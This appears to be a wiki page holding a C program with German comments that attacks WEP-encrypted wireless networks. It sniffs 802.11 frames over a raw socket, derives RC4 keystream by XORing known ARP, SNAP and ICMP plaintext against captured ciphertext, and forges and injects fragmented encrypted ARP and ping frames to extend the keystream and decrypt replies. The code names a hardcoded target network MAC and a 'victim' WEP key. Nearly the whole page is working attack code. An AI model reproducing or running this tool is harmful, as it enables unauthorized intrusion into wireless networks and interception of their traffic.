Arp and pingforwarding.c
Jump to navigation
Jump to search
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/ioctl.h> #include <errno.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <net/ethernet.h> #include <netinet/ip.h> #include <netinet/tcp.h> #include <string.h> #include <netinet/in.h> #include <net/if.h> #include <netpacket/packet.h> #include "rc4.h" #define SEND_BIT 28 //0x24(verschluesselt) <> 0x1c(unverschluesselt) #define crypt1 #define DEBUG #define KEY_LAENGE 64 //Bit #define TMAC0 0x00 #define TMAC1 0x0f #define TMAC2 0xb5 #define TMAC3 0x3f #define TMAC4 0x13 #define TMAC5 0x14 #if 0 #define TMAC0 0x00 #define TMAC1 0x11 #define TMAC2 0x88 #define TMAC3 0x28 #define TMAC4 0x73 #define TMAC5 0x30 #endif #if 0 #define MAC0 0x00 #define MAC1 0x13 #define MAC2 0x02 #define MAC3 0x2a #define MAC4 0x80 #define MAC5 0x8d #endif //0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source #define MAC0 0x00 #define MAC1 0x0f #define MAC2 0xb5 #define MAC3 0x97 #define MAC4 0x37 #define MAC5 0x37 typedef struct { int iv; unsigned char keyindex; unsigned char keystream[2400]; } key; int rawsock; extern int crc32_bitoriented(unsigned char *buffer, int length); extern void swap_byte(unsigned char *a, unsigned char *b); extern void prepare_key(unsigned char *key_data_ptr, int key_data_len, rc4_key *key); extern void rc4(unsigned char*buffer_ptr, int buffer_len, rc4_key *key); unsigned short chksum(unsigned char *data, int l); void filter(int min_len); void decrypt_arp(unsigned char packet[], int n); void decrypt_ping(unsigned char packet[], int n); unsigned char nul[1337] = {0}; unsigned char arp[] = { 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06,//LLC/SNAP 0x00, 0x01, //type ethernet 0x08, 0x00, //proto-type 0x06, 0x04, 0x00, 0x01, //hw, opcode 0x00, 0x0f, 0xb5, 0x97, 0x37, 0x37, //source-mac 0xc0, 0xa8, 0x8e, 0x02, //source IP NEEDS PATCH 0x16-0x19 XXX last byte= 64 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //target-mac 0xc0, 0xa8, 0x8e, 0x01 //target-ip }; unsigned char ping[]={ 0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00, 0x08, 0x00, //SNAP _7 0x45, 0x00, 0x01, 0x1c, // ipheader,flags, 2bit:laenge _11 0x00, 0x00, // Identification _13 0x40, //flags _14 0x00, //fragmen offset _15 0x40, // TTL _16 0x01, // Proto = ICMP _17 0x9c, 0x8c, // FIXME CHKSUM _19 0xc0, 0xa8, 0x8e, 0x02, //SRC IP _23 0xc0, 0xa8, 0x8e, 0x01, //DEST IP (TARGET) _27 0x08, //ICMP type echo request 0x00, //code _29 0x07, 0xd5, //icmp-chksum FIXME TODO XXX _31 0x08, 0x20, //identifier _33 0x00, 0x02, //sequenz _35 0x40, 0xe5, 0x18, 0x45, 0x2f, 0x37, 0x0a, 0x00, //statische daten 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff // _291 }; int ping_len = 292; uint8_t arp_len = 36; /* wandelt daten in hexzahlen um */ void hexdump (unsigned char *data, int len, int nl) { int i; for (i = 0; i < len; i++) printf ("%02x%c", data[i], (i < len - 1) ? ':' : 0); if (nl) printf ("\n"); } /* header ausgeben */ void print_header (unsigned char packet[], int n) { printf ("\nType:\t%x", (unsigned char) packet[0]); printf ("\nFlags:\t%x", (unsigned char) packet[1]); printf ("\nDauer:\t%u", (unsigned short) packet[2]); printf ("\nZiel-Mac:\t"); hexdump ((unsigned char *) packet + 0x04, 6, 0); printf ("\nBSS-Mac:\t"); hexdump ((unsigned char *) packet + 0x0a, 6, 0); printf ("\nQuell-Mac:\t"); hexdump ((unsigned char *) packet + 0x10, 6, 0); printf ("\nSequenzNR:\t%u", (unsigned short) packet[0x16]); printf ("\n##IV##:\t%x %x %x", (unsigned char) packet[0x18], (unsigned char) packet[0x19], (unsigned char) packet[0x1a]); printf ("\nKey-Index:\t%u\n", (unsigned char) packet[0x1b]); hexdump ((unsigned char *) packet + 0x1c, n - 3 - 0x1c, 1); printf ("WEP-ICV:\t"); hexdump ((unsigned char *) packet + n - 3, 4, 1); return; } unsigned char * get_bss(char packet[], int n) { return (unsigned char*)packet + + 10; } /* uint32_t modpot(uint32_t a, uint8_t e, uint8_t m) { uint32_t z, i; z = 1; for (i = ; }*/ void send_arp(unsigned char packet[], uint8_t iv[], uint8_t kv[], uint8_t key_idx) { unsigned char arp_enc[] = { 0x08, //Data //org0x45, //flags: enc, toDS, frag (FRAGS needs to be cleared for last package) 0x00, 0x00, 0x00, //duration-field TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS 0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //dest (broadcast) 0xff, 0xff, //sequence NEEDS PATCH 0x16-0x17 0xff, 0xff, 0xff, //IV NEEDS PATCH 0x18-0x1a 0xff, //key_idx NEEDS PATCH 0x1b 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload NEEDS PATCH 0x1c-0x23 0xff, 0xff, 0xff, 0xff //package-checksum NEEDS PATCH 0x24-0x27 }; //uint8_t arp_enc_len = 0x28; uint32_t ivc, packsum; int i, nr; unsigned int sequenz; sequenz = (packet[17]); sequenz = (sequenz<<4)+(packet[16]&0xf); sequenz += 42; ivc = 0; //fuer alle fragmente: for(nr=0;nr < (int)arp_len/4; nr++) { #ifdef crypt1 arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x41+0x08:0x45+0x08; #else arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x09:0xd; printf("runde: %d\tschalter: %x\n", nr, arp_enc[0x01]); #endif //arp_enc[0x01] = (nr==(int)(arp_len/4-1))?0x01+0x08:0x05+0x08; //build sequence-field /* fragment 4 bit - squenz 12 bit */ //sequenz++; //arp_enc[0x17] = packet[0x17]+(nr%16)?0:1; arp_enc[0x17] = (unsigned char)sequenz>>4; //die 8 hoechstwertigen bits arp_enc[0x16] = ((nr%16))|(unsigned char)((sequenz)<<4); //fragment-nr-4bit|sequenz-nr-4bit //printf("sequenz=%u\n",sequenz); #ifdef crypt1 //set IV arp_enc[0x18] = packet[0x18]; arp_enc[0x19] = packet[0x19]; arp_enc[0x1a] = packet[0x1a]; //set keyidx arp_enc[0x1b] = key_idx; #endif #ifdef crypt1 //packet fuellen - verschluesselt arp_enc[0x1c] = arp[0+(nr*4)]; arp_enc[0x1d] = arp[1+(nr*4)]; arp_enc[0x1e] = arp[2+(nr*4)]; arp_enc[0x1f] = arp[3+(nr*4)]; #else //packet fuellen - unverschluesselt printf("packet unverschluesselt fuellen\n"); arp_enc[0x18] = arp[0+(nr*4)]; arp_enc[0x19] = arp[1+(nr*4)]; arp_enc[0x1a] = arp[2+(nr*4)]; arp_enc[0x1b] = arp[3+(nr*4)]; #endif #if 0 arp_enc[0x18] = arp[0+(nr*4)]; arp_enc[0x19] = arp[1+(nr*4)]; arp_enc[0x1a] = arp[2+(nr*4)]; arp_enc[0x1b] = arp[3+(nr*4)]; #endif #ifdef crypt1 //build icv-checksum over packet ivc = crc32_bitoriented((arp+(nr*4)), 4); printf("crc : %X %X %X %X ist %8X\n", arp[0+(4*nr)], arp[1+(4*nr)], arp[2+(4*nr)], arp[3+(4*nr)], ivc); //build packet arp_enc[0x20] = *(((uint8_t *)&ivc)+0); arp_enc[0x21] = *(((uint8_t *)&ivc)+1); arp_enc[0x22] = *(((uint8_t *)&ivc)+2); arp_enc[0x23] = *(((uint8_t *)&ivc)+3); #endif #ifdef crypt1 printf("unverschluesselt:"); hexdump((unsigned char *) arp_enc + 0x1c,8,1); //verschluesseln for(i=0;i<8;i++) { arp_enc[0x1c + i] ^= kv[i]; } #endif #ifdef crypt1 printf("verschluesselter datenteil:\t"); hexdump((unsigned char *)arp_enc + 0x1c,8,1); #else printf("verschluesselter datenteil:\t"); hexdump((unsigned char *)arp_enc + 0x18,8,1); #endif //checksumme des packetes bilden packsum = crc32_bitoriented(arp_enc,36); #ifdef crypt1 arp_enc[0x24] = *(((uint8_t *)&packsum)+0); arp_enc[0x25] = *(((uint8_t *)&packsum)+1); arp_enc[0x26] = *(((uint8_t *)&packsum)+2); arp_enc[0x27] = *(((uint8_t *)&packsum)+3); #else arp_enc[0x1c] = *(((uint8_t *)&packsum)+0); arp_enc[0x1d] = *(((uint8_t *)&packsum)+1); arp_enc[0x1e] = *(((uint8_t *)&packsum)+2); arp_enc[0x1f] = *(((uint8_t *)&packsum)+3); #endif #ifdef crypt1 for(i=0;i<0x24;i++)printf("%x ",arp_enc[i]); printf("\n"); while(write(rawsock, arp_enc,0x24)!=0x24) ; #else for(i=0;i<SEND_BIT;i++)printf("%x ",arp_enc[i]); printf("\n"); while(write(rawsock, arp_enc,SEND_BIT)!=SEND_BIT) ; #endif // printf("%d. runde vollendet:", nr);getc(stdin); } filter(0); } /*debug*/ void filter(int min) { int n; unsigned char packet[2400]; int packetsize = 2400; printf("FILTER SUCHT PASSENDES PACKET\n\n"); while(1){ n = read (rawsock, packet, packetsize); /* wenn das netz eine bestimmt mac hat: packet+0x0a*/ if (//(packet[0] == 0x08) && (n > min) && ((TMAC0==(unsigned char)packet[10]) && (TMAC1==(unsigned char)packet[11]) && (TMAC2==(unsigned char)packet[12]) && (TMAC3==(unsigned char)packet[13]) && (TMAC4==(unsigned char)packet[14]) && (TMAC5==(unsigned char)packet[15])) && (((MAC0==(unsigned char)packet[4]) && (MAC1==(unsigned char)packet[5]) && (MAC2==(unsigned char)packet[6]) && (MAC3==(unsigned char)packet[7]) && (MAC4==(unsigned char)packet[8]) && (MAC5==(unsigned char)packet[9])) || ((MAC0==(unsigned char)packet[16]) && (MAC1==(unsigned char)packet[17]) && (MAC2==(unsigned char)packet[18]) && (MAC3==(unsigned char)packet[19]) && (MAC4==(unsigned char)packet[20]) && (MAC5==(unsigned char)packet[21]))) ) { printf("!!GOT RESPONSE!!\n"); print_header (packet, n); hexdump(packet,n,1); getc(stdin);getc(stdin); #ifdef crypt1 if(n>200) decrypt_ping(packet, n); decrypt_arp(packet, n); #endif return; } } } void send_ping(unsigned char packet[], unsigned char kv[], int n) { unsigned char ping_header[]={ 0x08, //Data //org0x45, //flags: enc, toDS, frag (FRAGS needs to be cleared for last package) 0x00, 0x00, 0x00, //duration-field TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS 0x00, 0x0F, 0xb5, 0x97, 0x37, 0x37, //source //TMAC0, TMAC1, TMAC2, TMAC3, TMAC4, TMAC5, //BSS 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, //dest 0xff, 0xff, //sequence NEEDS PATCH 0x16-0x17 0xff, 0xff, 0xff, //IV NEEDS PATCH 0x18-0x1a 0xff, //key_idx NEEDS PATCH 0x1b 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, //payload + icv }; int nr; int i, ivc, sequenz; //hexdump(ping+27,264,1); //printf("checksum vom ping-ding:\t%x\n", chksum(ping+27, 264)); sequenz = (packet[17]); sequenz = (sequenz<<4)+(packet[16]&0xf); for(nr=0;nr < (int)ping_len/36; nr++) { ping_header[0x01] = (nr==(int)(ping_len/36-1))?0x41+0x08:0x45+0x08; //build sequence-field /* fragment 4 bit - squenz 12 bit */ //sequenz++; //arp_enc[0x17] = packet[0x17]+(nr%16)?0:1; ping_header[0x17] = (unsigned char)sequenz>>4; //die 8 hoechstwertigen bits ping_header[0x16] = ((nr%16))|(unsigned char)((sequenz)<<4); //fragment-nr-4bit|sequenz-nr-4bit //set IV ping_header[0x18] = packet[0x18]; ping_header[0x19] = packet[0x19]; ping_header[0x1a] = packet[0x1a]; //set keyidx ping_header[0x1b] = packet[0x1b]; //packet fuellen for(i=0;i<36;i++) ping_header[0x1c + i] = ping[i+(nr*36)]; //build icv-checksum over packet ivc = crc32_bitoriented((ping+(nr*36)), 36); //build packet ping_header[0x40] = *(((uint8_t *)&ivc)+0); ping_header[0x41] = *(((uint8_t *)&ivc)+1); ping_header[0x42] = *(((uint8_t *)&ivc)+2); ping_header[0x43] = *(((uint8_t *)&ivc)+3); for(i=0;i<0x44;i++) ping_header[0x1c+i]^=kv[i]; //ausgeben des packets printf("AUSGEBEN DES PACKETES\n"); for(i=0;i<0x44;i++)printf("%x ", ping_header[i]); //senden des packets while(write(rawsock, ping_header,0x44)!=0x44) ; printf("\nWURDE GESENDET\n"); } filter(200); } unsigned short chksum(unsigned char *data, int l) { int i; unsigned short sum = 0; for(i=0;i<l;i+=2){ sum += (unsigned short)(((data[i]^0xff)<<8)+(data[i+1]^0xff)); } printf("%d\n",i); return sum; } void decrypt_arp(unsigned char packet[], int n) { int i, packsum; unsigned char kv[2400]; unsigned char nul[2400]; unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer rc4_key rc4_schluessel; unsigned char ivc[4]; #ifdef crypt1 if(packet[0]==0xb0)printf("authentication frame found\n"); //if(n!=86) {printf("kein arp-packet!!\n"); return;} //kein arp #endif printf ("\n##IV##:\t%x %x %x\n", (unsigned char) packet[0x18], (unsigned char) packet[0x19], (unsigned char) packet[0x1a]); for(i=0;i<36;i++) { kv[i] = packet[0x1c+i]^arp[i];} //36 Byte Schluessel aus bekanntem ARP erraten packsum = crc32_bitoriented(arp,36); ivc[3] = *(((uint8_t *)&packsum)+3); ivc[2] = *(((uint8_t *)&packsum)+2); ivc[1] = *(((uint8_t *)&packsum)+1); ivc[0] = *(((uint8_t *)&packsum)+0); printf("crc vom arp ist %x %x %x %x\n", ivc[0], ivc[1], ivc[2], ivc[3]); #ifdef crypt1 /* i == 36 */ i = 36; kv[i] = ivc[0]^packet[0x1c+i];i++; kv[i] = ivc[1]^packet[0x1c+i];i++; kv[i] = ivc[2]^packet[0x1c+i];i++; kv[i] = ivc[3]^packet[0x1c+i];i++; printf("berechneter Keystream:\n"); for(i=0;i<40;i++) printf("%x ",kv[i]); printf("\nRC4-Keystream\n"); wep_key[0]=packet[0x18]; wep_key[1]=packet[0x19]; wep_key[2]=packet[0x1a]; prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel); for(i=0;i<80;i++) nul[i]=0x00; rc4(nul,40,&rc4_schluessel); for(i=0;i<80;i++) printf("%x ",nul[i]); for(i=0;i<40;i++) packet[28+i]^=kv[i]; // Vergleich mit erwarteten ARP-Packet printf("\nEntschluesseltes Packet:\n"); for(i=0;i<68;i++) printf("%x ",packet[i]); printf("\n"); i = 40; /* ***************************************************** */ send_ping(packet, kv, i); #endif } void decrypt_ping(unsigned char packet[], int n) { int i, packsum; unsigned char kv[2400]; unsigned char nul[2400]; unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer rc4_key rc4_schluessel; unsigned char ivc[4]; printf ("\nPING DECRYPT\n##IV##:\t%x %x %x\n", (unsigned char) packet[0x18], (unsigned char) packet[0x19], (unsigned char) packet[0x1a]); for(i=0;i<(n-(0x1c + 4));i++) { kv[i] = packet[0x1c+i]^ping[i];} //n Byte Schluessel aus bekanntem ping erraten packsum = crc32_bitoriented(ping,ping_len); ivc[3] = *(((uint8_t *)&packsum)+3); ivc[2] = *(((uint8_t *)&packsum)+2); ivc[1] = *(((uint8_t *)&packsum)+1); ivc[0] = *(((uint8_t *)&packsum)+0); printf("crc vom ping ist %x %x %x %x\n", ivc[0], ivc[1], ivc[2], ivc[3]); /* i == 36 */ i = n - 4; kv[i] = ivc[0]^packet[0x1c+i];i++; kv[i] = ivc[1]^packet[0x1c+i];i++; kv[i] = ivc[2]^packet[0x1c+i];i++; kv[i] = ivc[3]^packet[0x1c+i];i++; printf("berechneter Keystream:\n"); //for(i=0;i<(n-0x1c);i++) printf("%x ",kv[i]); hexdump(kv,n-0x1c,1); printf("\nRC4-Keystream\n"); wep_key[0]=packet[0x18]; wep_key[1]=packet[0x19]; wep_key[2]=packet[0x1a]; prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel); for(i=0;i<(n-0x1c);i++) nul[i]=0x00; rc4(nul,n-0x1c,&rc4_schluessel); //for(i=0;i<(n-0x1c);i++) printf("%x ",nul[i]); hexdump(nul,n-0x1c,1); for(i=0;i<(n-0x1c);i++) packet[28+i]^=kv[i]; // Vergleich mit erwarteten ARP-Packet printf("\nEntschluesseltes Packet:\n"); //for(i=0;i<n;i++) printf("%x ",packet[i]); hexdump(packet,n,1); printf("\n"); } void have_fun(unsigned char packet[], int n) { unsigned char iv[3], key_idx, kv[8]; char ask; int i = 0; rc4_key rc4_schluessel; unsigned char wep_key[]={0x00,0x00,0x00,0xf0,0x0b,0xaf,0x00,0xba}; //opfer // unsigned char wep_key[]={0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef}; //check if type is data if ((unsigned char) packet[0] != 0x08) return; printf("data-package received\n"); //check if packet is encrypted //if (! (((unsigned char) packet[1]) & 0x40)) return; #ifdef crypt1 printf("IV: %X%X%X (KeyIdx: %x)\n", packet[24], packet[25], packet[26], packet[27]); iv[0] = packet[24]; iv[1] = packet[25]; iv[2] = packet[26]; key_idx = packet[27]; wep_key[0]= iv[0]; wep_key[1]= iv[1]; wep_key[2]= iv[2]; printf("#DEBUG:\tWEP_KEY =\t"); for(i=0;i<8;i++) printf("%x ", wep_key[i]); #endif //building first 7 byte of keystream by cypherstream XOR SNAP //standard-SNAP: AA AA 03 00 00 00 08 kv[0] = packet[28] ^ 0xaa; kv[1] = packet[29] ^ 0xaa; kv[2] = packet[30] ^ 0x03; kv[3] = packet[31] ^ 0x00; kv[4] = packet[32] ^ 0x00; kv[5] = packet[33] ^ 0x00; kv[6] = packet[34] ^ 0x00; //guess if it is ARP or IPv4 for 8th byte of key if (n == 86) { //ARP printf("Packet is propably ARP\n"); kv[7] = packet[35] ^ 0x06; } else {//IPv4 or else printf("Packet is propably IPv4\n"); kv[7] = packet[35] ^ 00; } kv[7]=0x27^packet[35]; #ifdef DEBUG printf("IV= %x %x %x (key_index=%u)\n", iv[0], iv[1],iv[2],key_idx); printf("First 8 Byte of Keystream: %X %X %X %X %X %X %X %X \n", kv[0], kv[1], kv[2], kv[3], kv[4], kv[5], kv[6], kv[7]); printf("starting RC4-PRNG\n"); prepare_key(wep_key,8/* KEY_LAENGE*/, &rc4_schluessel); for(i=0;i<8;i++) nul[i]=0x00; rc4(nul,8, &rc4_schluessel); printf("Schluesselstrom=\t"); for(i=0;i<8;i++) printf("%x\t", nul[i]); printf("\n(mit schluesselstrom) entschluesseltes packet:\n"); for(i=0;i<8;i++) printf("%x\t", nul[i]^packet[28+i]); printf("\n"); #endif // printf("First 8 Byte of Keystream: %X %X %X %X %X %X %X %X \n", kv[0], kv[1], kv[2], kv[3], kv[4], kv[5], kv[6], kv[7]); printf("Proceed y/n? "); ask = getc(stdin); getc(stdin); if (ask == 'y') send_arp(packet, iv, kv, key_idx); return; } // Main Part int main (int argc, char **argv) { int sock, uid, n, i; int packetsize = 2400; //sizeof(struct ether_header) + sizeof(struct iphdr) + sizeof(struct tcphdr); unsigned char packet[packetsize]; struct ifreq ifr; struct sockaddr_ll addr; i = 0; if (argc != 2) { printf ("use ./sniff <dev>\n"); return -1; } // Are you root? uid = getuid (); if (uid != 0) { printf ("You must have UID 0 instead of %d.\n", uid); exit (1); } // Raw Socket oeffnen /*by biba */ if ((sock = socket (PF_PACKET, SOCK_RAW, 0)) < 0) return -1; bzero (&ifr, sizeof (ifr)); strcpy (ifr.ifr_name, argv[1]); if (ioctl (sock, SIOCGIFHWADDR, &ifr)) { close (sock); return -1; } if (ioctl (sock, SIOCGIFINDEX, &ifr)) { close (sock); return -1; } close (sock); if ((sock = socket (PF_PACKET, SOCK_RAW, htons (0x3))) == -1) { perror ("socket"); exit (1); } bzero (&addr, sizeof (addr)); addr.sll_family = AF_PACKET; addr.sll_ifindex = ifr.ifr_ifindex; rawsock = sock; #if 1 if (bind (sock, (struct sockaddr *) &addr, sizeof (addr)) < 0) { close (sock); printf ("failed to bind device\n"); return -23; } #endif /* */ /*************/ // if( (sock = socket(AF_INET,SOCK_PACKET,htons(0x3))) == -1) { perror("socket"); exit(1); } while (1) { n = read (sock, packet, packetsize); /* wenn das netz eine bestimmt mac hat: packet+0x0a*/ if (//(packet[0] == 0x08) && ((TMAC0==(unsigned char)packet[10]) && (TMAC1==(unsigned char)packet[11]) && (TMAC2==(unsigned char)packet[12]) && (TMAC3==(unsigned char)packet[13]) && (TMAC4==(unsigned char)packet[14]) && (TMAC5==(unsigned char)packet[15])) /* && (((MAC0==(unsigned char)packet[4]) && (MAC1==(unsigned char)packet[5]) && (MAC2==(unsigned char)packet[6]) && (MAC3==(unsigned char)packet[7]) && (MAC4==(unsigned char)packet[8]) && (MAC5==(unsigned char)packet[9])) || ((MAC0==(unsigned char)packet[16]) && (MAC1==(unsigned char)packet[17]) && (MAC2==(unsigned char)packet[18]) && (MAC3==(unsigned char)packet[19]) && (MAC4==(unsigned char)packet[20]) && (MAC5==(unsigned char)packet[21])))*/ ) print_header (packet, n); have_fun(packet, n); #if 0 for (i = 0; i < n; i++) printf ("%x ", (unsigned char) packet[i]); printf ("%s:%d\t --> \t%s:%d \tSeq: %d \tAck: %d\n", inet_ntoa (*(struct in_addr *) &ip->saddr), ntohs (tcp->source), inet_ntoa (*(struct in_addr *) &ip->daddr), ntohs (tcp->dest), ntohl (tcp->seq), ntohl (tcp->ack_seq)); #endif /* */ } return 0; }